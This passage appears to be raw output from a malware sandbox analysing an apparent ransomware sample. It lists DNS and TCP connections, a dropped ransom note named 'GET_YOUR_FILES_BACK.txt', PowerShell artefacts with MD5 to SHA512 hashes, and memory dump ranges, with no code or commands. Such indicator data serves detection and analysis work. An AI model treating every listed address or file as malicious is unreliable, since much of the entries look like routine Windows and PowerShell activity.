US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 199.176.139.52.in-addr.arpa udp
US 8.8.8.8:53 76.38.195.152.in-addr.arpa udp
US 20.42.73.25:443 tcp
NL 173.223.113.164:443 tcp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 86.8.109.52.in-addr.arpa udp
US 209.197.3.8:80 tcp
NL 173.223.113.131:80 tcp
US 204.79.197.203:80 tcp
US 8.8.8.8:53 168.238.32.23.in-addr.arpa udp

Files

\Device\HarddiskVolume1\GET_YOUR_FILES_BACK.txt

MD5 6d81ed40ba0a283e5483bfe6a448e9d7
SHA1 0c847a5f9df743b13e1aa11b4c24a4309e9a7119
SHA256 b4464f61655ca584170694bedd52c6cff2b74c18a761b33cfb1387f017d2d57d
SHA512 8956415f155f24852ac672aa06cc6a8819a2a0e44a9b940f8f3390c34ebb43ff10f4635722f104a5a9a94098d3f286362f507dc49d3f048e540f48c073eaf379

memory/9652-13501-0x0000027A49F80000-0x0000027A49F90000-memory.dmp

memory/9652-14195-0x0000027A49F80000-0x0000027A49F90000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2z2e20tv.qxl.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/9652-14270-0x0000027A49EF0000-0x0000027A49F12000-memory.dmp

memory/9652-17137-0x0000027A49F80000-0x0000027A49F90000-memory.dmp

memory/9652-24870-0x0000027A49F20000-0x0000027A49F68000-memory.dmp

C:\GET_YOUR_FILES_BACK.txt

MD5 6d81ed40ba0a283e5483bfe6a448e9d7
SHA1 0c847a5f9df743b13e1aa11b4c24a4309e9a7119
SHA256 b4464f61655ca584170694bedd52c6cff2b74c18a761b33cfb1387f017d2d57d
SHA512 8956415f155f24852ac672aa06cc6a8819a2a0e44a9b940f8f3390c34ebb43ff10f4635722f104a5a9a94098d3f286362f507dc49d3f048e540f48c073eaf379

memory/20972-24882-0x000001A3B0B20000-0x000001A3B0B30000-memory.dmp

memory/20972-24881-0x000001A3B0B20000-0x000001A3B0B30000-memory.dmp

memory/9652-24885-0x0000027A49F20000-0x0000027A49F68000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d5ec758b0f3f7a5300c0883d9749a5c6
SHA1 571a3baa5a6d8f952da3e22a27bbff9c23196764
SHA256 84c323e71d91cb5ff283f05ed017de768df8b567f16a688140a902ebb6ffcf9f
SHA512 32f1ee09bfa821dc99429093a839d267d7fec6228b2b9557b0c799bfc44819594ac9657501aaf598384a5b4da0c11386d0928cf37ad8a7335fc4325948593337

memory/20972-24890-0x000001A3B2920000-0x000001A3B2968000-memory.dmp